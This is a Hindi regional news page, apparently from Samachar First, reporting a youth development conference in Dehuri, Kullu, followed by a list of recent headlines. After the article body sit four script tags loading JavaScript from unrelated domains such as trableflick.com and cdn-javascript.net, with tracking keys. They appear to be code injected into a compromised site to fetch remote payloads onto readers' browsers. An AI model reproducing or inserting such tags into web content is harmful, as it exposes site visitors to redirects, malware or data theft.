Categories: हिमाचल

कुल्लूः दुर्गा युवा कल्व देहुरी ने युवा विकास सम्मेलन का आयोजन किया

<p>जिला कुल्लू में नेहरू युवा केन्द्र के सौजन्य से दुर्गा युवा कल्व देहुरी ने युवा विकास सम्मेलन का आयोजन माता दुर्गा भगवती के प्रांगण देहुरी (सेंज) में किया गया। जिसमें बंजार खंड के विभिन्न युवक मंडल , महिला मंडल और स्वयं सहायता समुह उपस्थित रहे। कार्यक्रम के दौरान नेहरू युवा केन्द्र कुल्लू के राष्ट्रीय स्वयंसेवी राकेश कुमार ने नेहरू युवा केन्द्र संगठन के बारे जानकारी दी और युवा विकास सम्मेलन के आयोजन उद्देश्यों के बारे में बताया। कार्यक्रम में राजकीय वरिष्ठ माध्यमिक विद्यालय देहुरी के प्रधानाचार्या महोदय चंद्रप्रकाश&nbsp; बतौर मुख्य अतिथि रहे। उन्हों ने कहा कि महिला मंडल और युवक मंडल गांव के विकास की एक अहम कड़ी है। अतः हर गांव में महिला मंडल और युवक मंडल का होना आवश्यक है।</p>

<p>साथ ही नेहरू युवा केन्द्र की सराहना करते हुए कहा कि नेहरू युवा केन्द्र की यह एक अनूठी पहल है कि गांव-गांव&nbsp; में महिला मंडल औऱ युवक मंडलों के बीच जा कर अपने कार्यक्रमों की जानकारी प्रदान कर रहा है। जिससे महिला मंडल और युवक मंडलों में कार्य करने&nbsp; की इच्छा बढती है। इस प्रकार के कार्यक्रम समय-समय पर करते रहना चाहिए। कार्यक्रम के दौरान नेहरू युवा केन्द्र कुल्लू की जिला युवा समन्वयक सोनिका चंद्रा भी उपस्थित रही और उन्हों ने कार्यक्रम में उपस्थित मुख्य अतिथियों और महिला मंडलों और युवक मंडलों का कार्यक्रम में पधारने पर धन्यवाद किया साथ ही सभी महिला मंडल और युवक मंडलों को अच्छा कार्य करने और नए युवक मंडल बनाने के लिए प्रेरित किया।</p>

<p>कार्यक्रम में उपस्थित पुर्व राष्ट्रीय स्वयं सेवी पुर्ण चंद ने नेहरू युवा केन्द्र के कोर प्रोग्रामों&nbsp; के बारे विस्तार से जानकारी दी और नए युवक मंडल और महिला मंडल बनाने बारे भी जानकारी दी। विनोद कुमार&nbsp; ने उपायुक्त महोदय द्वारा चलाये जा रहे संवेदना कार्यक्रम की संक्षिप्त जानकारी दी। उन्होंने बताया महिलाएं यदी माहावारी के समय सफाई का ध्यान न रखे तो कैन्सर जैसी भयानक बीमारियों का सामना करना पड़ सकता है। साथ ही कार्यक्रम में उपस्थित पृथ्वी शर्मा, जिला कारदार संग के सचिव नारायण चौहान , दुर्गा युवा कल्व के प्रधान योगराज जी ने भी अपने विचार सांझा किये। कार्यक्रम के दौरान राजकीय वरिष्ठ माध्यमिक विद्यालय देहरी की छात्राओं द्वारा भाषण तथा एकल गान प्रस्तुत किये जो कि नशा और स्वचछ भारत के विषय पर आधारित थे। कार्यक्रम के अंत में&nbsp; ग्राम पंचायत बनोगी के उप प्रधान हेमराज जी ने&nbsp; नेहरू युवा केन्द्र और मुख्य अतिथि महोदय और उपस्थित सभी महिला मंडलऔर युवक मंडलों का कार्यक्रम को सफल बनाने के लिए धन्यवाद किया और भविष्य में ऐसे कार्यक्रमों को बनोगी पंचायत में करवाने का आग्रह किया।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1580898039457″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

द हंस फाऊंडेशन एमएमयू 2 बंजार द्वारा सामान्य चिकित्सा शिविर का अयोजन

एमएमयू इकाई 2 बंजार के द्वारा राजकीय वरिष्ठ माध्यमिक पाठशाला कनौन में किशोरियों को सामाजिक…

30 mins ago

हिमाचल में 2 दिन बाद एक्टिव होगा वेस्टर्न डिस्टरबेंस:9-10 अक्टूबर को बारिश; बढ़ेगी ठंड, अभी तापमान सामान्य से ज्यादा

Shimla: हिमाचल प्रदेश में दो दिन बाद पश्चिमी विक्षोभ (WD) एक्टिव हो रहा है। इससे…

3 hours ago

Himachal: हिमाचल प्रदेश के बिजली उपभोक्ताओं को सब्सिडी अब सीधे बैंक खाते में मिलेगी

Himachal power subsidy:  हिमाचल प्रदेश के बिजली उपभोक्ताओं को अब बिजली पर मिलने वाली सब्सिडी…

4 hours ago

Mandi News: नवरात्रों में माता बगलामुखी मंदिर में भक्तों का उमड़ा सैलाब, भक्तों की मनोकामनाएं हो रही हैं पूर्ण

Baglamukhi Temple  : सदर विधानसभा क्षेत्र के तुंगल में स्थित प्रसिद्ध देवी माता बगलामुखी मंदिर…

4 hours ago

Pakistan News: शादी की मनाही पर लड़की ने परिवार को दिया जहर, 13 की मौत

Pakistan family poisoned murder : पाकिस्तान के सिंध प्रांत में एक दिल दहला देने वाली…

4 hours ago

मुख्यमंत्री सुक्खू ने अचानक किया IGMC शिमला का निरीक्षण, मरीजों से लिया फीडबैक

CM Sukhu visits IGMC Shimla:  हिमाचल प्रदेश के मुख्यमंत्री सुखविंद्र सिंह सुक्खू सोमवार सुबह 7:00…

5 hours ago